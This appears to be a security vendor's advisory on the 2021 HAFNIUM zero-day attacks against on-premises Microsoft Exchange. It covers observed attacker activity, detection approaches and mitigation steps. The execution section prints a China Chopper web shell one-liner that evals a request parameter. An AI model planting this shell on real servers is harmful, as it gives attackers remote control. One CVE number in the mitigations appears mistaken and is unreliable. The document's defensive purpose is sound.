Critical Exchange Vulnerability: Quick Grab on Detection & Mitigation

Background:

Microsoft has detected multiple zero-day exploits on the on-premises version of the Microsoft Exchange Server (2013,2016, and 2019). Microsoft attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.

On March 2^nd, 2021, Microsoft released a blog post that detailed multiple zero-day vulnerabilities used to attack on-premise versions of the Microsoft Exchange Server. [Note: Exchange Online is not affected]

What did we observe?

We have captured here what we saw in the initial days across our MDR Global Delivery Centers (GDC) post disclosure of the high-impact Microsoft Exchange Server vulnerability.

Reconnaissance:

Our MDR GDCs observed active reconnaissance attempts from cybercrime syndicates given below. Few of these IPs are associated with TOR relay networks.

• IP addresses seen commonly in reconnaissance Activity
  

These connections are part of initial reconnaissance to identify whether the service hosted on the targeted asset is an Exchange server.

Exploitation:

We have observed multiple exploit attempts across various organizations, and some examples are given below:

• An attempt was made to access specific files and paths within Exchange Control Panel [ECP] vDir
  • In an organization that had not exposed the ECP console or had restricted services exposed, we observed Error Code 404 [Not found] in the IIS server
    

• In an Organization where the exchange services were not restricted, we observed status code 200 [ HTTP OK Success]
  
  • In an organization where the exchange services were placed before the VPN services, we observed no active exploit of the vulnerability.

Execution:

• Usage of Web shells
  • By leveraging CVE 2021-26858; the threat actor dropped web shells to path /netpub/wwwroot/aspnet_client/ & $($env:exchangeinstallpath)/Frontend/.
  • The attackers dropped known web shell “China chopper” by using PowerShell Set-OabVirtualDirectory cmdlet.

http://Server/V15/ClientAccess/OAB/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“NO9BxmCXw0JE”],”unsafe”);}</script>

Note – This webshells were attributed towards chopper web shell which is widely used backdoor by Chinese.

• Process Injection
  • As a SYSTEM user in UMWorkerprocess.exe the attacker uses CVE 2021-26857 to execute PowerShell and then download and run powercat.
• Usage of Privilege commands
  • Observed commands such as “attrib,” “cmd,” “PowerShell” in IIS Logs.
  • Additions of Powershell snap-ins
    • Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn
• Web Log User-Agents
  • Non Standard user agents were observed in the IIS logs
    • ExchangeServicesClient/0.0.0.0
    • python-requests/2.25.1
    • python-requests/2.19.1
    • Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html
    • Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)
    • Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)
    • Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)

Data Exfiltration:

• • To exfiltrate data, we expect that attackers will compress outlook address book, user mailboxes etc. in .zip, .rar, and .7z files within a specific folder C:\ProgramData\ before actual exfiltration attempt

How to Detect

This section has captured critical techniques to detect active exploits against the Microsoft Exchange Server vulnerabilities. This is in addition to known IoC based detection using threat intelligence and EPP/EDR.

Threat Hunting using Machine Learning Models:

• Data Exfiltration: Based on User and Entity profiling within the environment, we can establish normal traffic baselines, which can then be compared with inconsistent patterns [sudden Increase in data traffic, large download of data traffic, Exfiltration to newly registered domain etc.]

• Process Baselining: Frequency & pattern analysis will assist in detecting outliers. This is useful to detect new processes launched to establish persistence, lateral movement, and data exfiltration

• Lateral Movement: Entity profiling within the environment’s regular traffic can be compared with established baselines to detect inconsistent patterns [Sudden increase in the number of connections, Connections to multiple destinations within a short period, connection to a high number of ports etc.]

Using SIEM Correlation Rules

• Monitor Web server logs for the following
  • High Number of Error codes [ 400, 401, 404]
  • Usage of Suspicious User Agents
  • Connections from a suspicious IP address
  • Uncommon HTTP referrers
  • Missing HTTP referrers
• Lateral Movement
  • Validate all RPC, SMB, WMI protocol connections

YARA Rules

• Rules to detect a sign of compromise [ Refer Appendix]

Mitigation
We have summarized mitigation steps for immediate action.

• Apply the security updates for Exchange Server to ensure all relevant vulnerabilities are fixed.
• In case of delay in updating security updates to the Exchange server, perform the following
  • Disable the ECP application pool to mitigate CVE 2020-26065
  • Disable the OAB application pool to mitigate CVE 2021-26858
  • Wherever possible, limit the exchange of web services to a public network. A VPN service should be in place to restrict access to this exchange
• Detect and restrict below-listed Indicators of compromise
  • Web shell hashes
    

• • • Reconnaissance Activity
      

*- Tor Exit Nodes
**- Geography [China, Hong Kong & Japan]

Microsoft has released a feed of observed indicators of compromise (IOCs) in related attacks. This feed is available in both CSV and JSON formats. And the information is being shared as TLP:WHITE.

Appendix: